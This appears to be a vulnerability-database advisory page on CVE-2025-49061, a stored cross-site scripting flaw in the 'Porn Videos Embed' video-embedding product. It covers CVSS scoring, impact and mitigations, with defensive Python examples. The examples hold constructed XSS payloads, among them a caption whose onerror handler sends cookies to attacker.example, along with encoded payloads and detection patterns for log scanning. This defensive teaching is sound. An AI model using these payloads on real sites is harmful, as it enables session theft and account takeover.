CVE-2025-49061: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in perteus Porn Videos Embed
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in perteus Porn Videos Embed allows Stored XSS. This issue affects Porn Videos Embed: from n/a through 0.9.1.
AI Analysis
Technical Summary
CVE-2025-49061 is a stored cross-site scripting (XSS) vulnerability, CWE-79, in the 'Porn Videos Embed' product by perteus, affecting all versions through 0.9.1. Input supplied by a site user is written into generated pages without adequate neutralization, so an attacker with a low-privileged account can store a script payload that later executes in the browser of every user who views the affected page. The CVSS 3.1 base score is 6.5 (medium). The vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L breaks down as: exploitable over the network with low attack complexity; requires low privileges (an account able to submit content handled by the product); requires user interaction (a victim must load the page containing the stored payload); and scope changed, because the payload runs in the victim's browser, a different security authority from the web application that stored it. Confidentiality, integrity and availability impacts are each rated low. In practice, stored XSS lets an attacker run arbitrary JavaScript as the victim: read data the page exposes, perform authenticated actions on the victim's behalf (including against administrators who view the stored content), deface pages, or redirect visitors to malicious content; session cookies are directly readable only when they lack the HttpOnly flag. Because the product is a niche video-embedding component, exposure is limited to sites that install it. At the time of writing the advisory lists no fixed version and no public exploit is known, but the issue is publicly disclosed and could be targeted in the future.
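The failure pattern behind CWE-79, and the output-encoding fix, shown on a hypothetical embed renderer. This is an added example for this page, not code from the Porn Videos Embed product; the field names, the placeholder allowlisted host `video.example` and the attacker record are all constructed for illustration.

```python
import html
from urllib.parse import urlsplit

# Assumption: embeds may only point at this allowlisted video host.
# Placeholder name chosen for the example, not a real embed provider.
ALLOWED_EMBED_HOSTS = {"video.example"}


def render_embed_vulnerable(title, embed_url, caption):
    """Stored-XSS pattern (CWE-79): fields saved by a low-privileged user
    are concatenated straight into HTML, so any markup they contain is
    parsed and executed by every visitor who loads the page."""
    return (
        f'<div class="embed" title="{title}">'
        f'<iframe src="{embed_url}"></iframe>'
        f"<p>{caption}</p></div>"
    )


def safe_embed_url(embed_url):
    """Return the URL only if it is http(s) on an allowlisted host, else
    None. Validation, not encoding, is what blocks javascript: and data:
    URIs in an iframe src."""
    parts = urlsplit(embed_url)
    if parts.scheme not in ("http", "https"):
        return None
    if parts.hostname not in ALLOWED_EMBED_HOSTS:
        return None
    return embed_url


def render_embed_hardened(title, embed_url, caption):
    """Same page, with context-aware output encoding. html.escape with
    quote=True turns & < > " ' into entities, which is safe both inside a
    quoted attribute value and in element text; the iframe src is
    validated first because encoding cannot make a javascript: URL safe."""
    url = safe_embed_url(embed_url)
    if url is None:
        return '<div class="embed"><p>Embed source not allowed</p></div>'
    return (
        f'<div class="embed" title="{html.escape(title, quote=True)}">'
        f'<iframe src="{html.escape(url, quote=True)}"></iframe>'
        f"<p>{html.escape(caption, quote=True)}</p></div>"
    )


# Constructed attacker-controlled record; not a payload from the advisory.
PAYLOAD_TITLE = '"><script>alert(document.cookie)</script>'
PAYLOAD_URL = "javascript:alert(1)"
PAYLOAD_CAPTION = "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"

if __name__ == "__main__":
    print(render_embed_vulnerable(PAYLOAD_TITLE, PAYLOAD_URL, PAYLOAD_CAPTION))
    print(render_embed_hardened(PAYLOAD_TITLE, "https://video.example/v/123", PAYLOAD_CAPTION))
```

Note that the hardened output still contains the literal text `onerror=` inside the caption; that is expected, because the `<` that would open the tag has become `&lt;` and the browser renders the caption as text. Escaping must be done at output time for each context (attribute, text, URL), not once on input, since the same stored string may be emitted into several contexts.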
Potential Impact
For European organizations, the impact depends on whether they operate or host websites that use the 'Porn Videos Embed' product. Where it is deployed, exploitation could lead to session hijacking, actions performed in the name of logged-in users (including site administrators who view the stored content), defacement, or delivery of malicious content to visitors, with the associated damage to reputation and user trust. Given the product's purpose, organizations involved in adult content hosting or affiliate marketing are most likely to be exposed. A compromise of user data through XSS could also attract regulatory scrutiny under GDPR. The medium severity indicates moderate risk, but because the payload is stored and the scope is changed, a single injection can persist and affect every user who views the page until it is removed. Organizations that do not use this product are not affected.
Mitigation Recommendations
Organizations should first determine whether they run the 'Porn Videos Embed' product, and at which version; all versions through 0.9.1 are affected. Since the advisory lists no fixed version, immediate mitigations are compensating controls: deploy a web application firewall with XSS rule sets in front of the site as a stopgap (it cannot be relied on to catch every payload), and at the application level enforce input validation on stored fields and context-aware output encoding wherever they are rendered. Restrict the roles that may submit content handled by the product to the minimum necessary, because the attack requires only a low-privileged account. Review content already stored by the product for injected markup, since a payload may have been planted before mitigations were applied. Mark session cookies HttpOnly and SameSite to limit what a successful script can steal, and deploy a Content-Security-Policy that restricts script sources; these do not remove the vulnerability but reduce its impact. Monitor web logs for script tags, event-handler attributes and javascript: URIs in submitted parameters, and for unusual activity from accounts that can submit content. Follow vendor and Patchstack advisories for a fixed release and apply it as soon as it is available; if no fix appears, consider removing the product or replacing it with a maintained alternative. Educating users about suspicious links adds a further layer, but note that browser-side XSS filters are no longer present in current browsers and should not be counted on.
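A small log-triage script for the monitoring recommendation above, added here as an example and not part of the original advisory or the product. It parses combined-format access-log lines, URL-decodes request paths repeatedly (attackers double-encode to slip past single-pass filters), and flags the XSS markers named above. The log lines, IP addresses and paths are constructed; they are not the product's real endpoints.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log (combined format); not real traffic, placeholder paths.
SAMPLE_LOG = """\
198.51.100.7 - - [14/Aug/2025:10:48:03 +0000] "GET /videos?id=42 HTTP/1.1" 200 512
203.0.113.5 - alice [14/Aug/2025:10:48:10 +0000] "POST /embed/save?title=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 88
203.0.113.5 - alice [14/Aug/2025:10:48:12 +0000] "POST /embed/save?caption=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 88
192.0.2.9 - - [14/Aug/2025:10:49:00 +0000] "GET /videos?q=javascript%3Aalert(1) HTTP/1.1" 200 300
198.51.100.7 - - [14/Aug/2025:10:49:30 +0000] "GET /search?q=onboarding&section=2 HTTP/1.1" 200 99
"""

# ip ident user [timestamp] "METHOD path PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers of script injection, matched against the fully decoded path.
# \b before on\w+= avoids false positives such as "section=" or "onboarding".
XSS_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\bon\w+\s*=", re.I),
    "js_uri": re.compile(r"javascript\s*:", re.I),
    "html_injection": re.compile(r"<\s*(?:iframe|img|svg|object|embed|math)\b", re.I),
}


def fully_decode(value, max_rounds=3):
    """URL-decode until the value stops changing, so %253C (double-encoded
    '<') is seen as '<'. Bounded to avoid looping on pathological input."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(path):
    """Return the names of all XSS patterns found in the decoded path."""
    decoded = fully_decode(path)
    return [name for name, rx in XSS_PATTERNS.items() if rx.search(decoded)]


def scan_log(text):
    """Return one hit per request whose path carries an XSS marker."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        matched = classify(m.group("path"))
        if matched:
            hits.append({
                "ip": m.group("ip"),
                "user": m.group("user"),
                "method": m.group("method"),
                "path": fully_decode(m.group("path")),
                "patterns": matched,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Two caveats for real use: standard access logs record the query string but not POST bodies, so a payload submitted in a form body will only be visible if request-body logging or WAF logging is enabled; and pattern matching like this is a triage aid, not a filter, since encoded and obfuscated payloads can evade it. Pair it with a direct review of the content the product has stored, which is where a stored XSS payload ultimately lives.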
Affected Countries
Germany, United Kingdom, France, Netherlands, Spain, Italy
Technical Details
- Data Version: 5.1
- Assigner Short Name: Patchstack
- Date Reserved: 2025-05-30T14:04:42.919Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 689dbee3ad5a09ad0059e602
Added to database: 8/14/2025, 10:48:03 AM
Last enriched: 8/14/2025, 11:50:28 AM
Last updated: 9/5/2025, 12:20:39 AM
Related Threats
- CVE-2025-58362: CWE-706: Use of Incorrectly-Resolved Name or Reference in honojs hono (High)
- CVE-2025-58179: CWE-918: Server-Side Request Forgery (SSRF) in withastro astro (High)
- CVE-2025-55739: CWE-798: Use of Hard-coded Credentials in FreePBX security-reporting (Medium)
- CVE-2025-58352: CWE-613: Insufficient Session Expiration in WeblateOrg weblate (Low)
- CVE-2025-55244: CWE-284: Improper Access Control in Microsoft Azure Bot Service (Critical)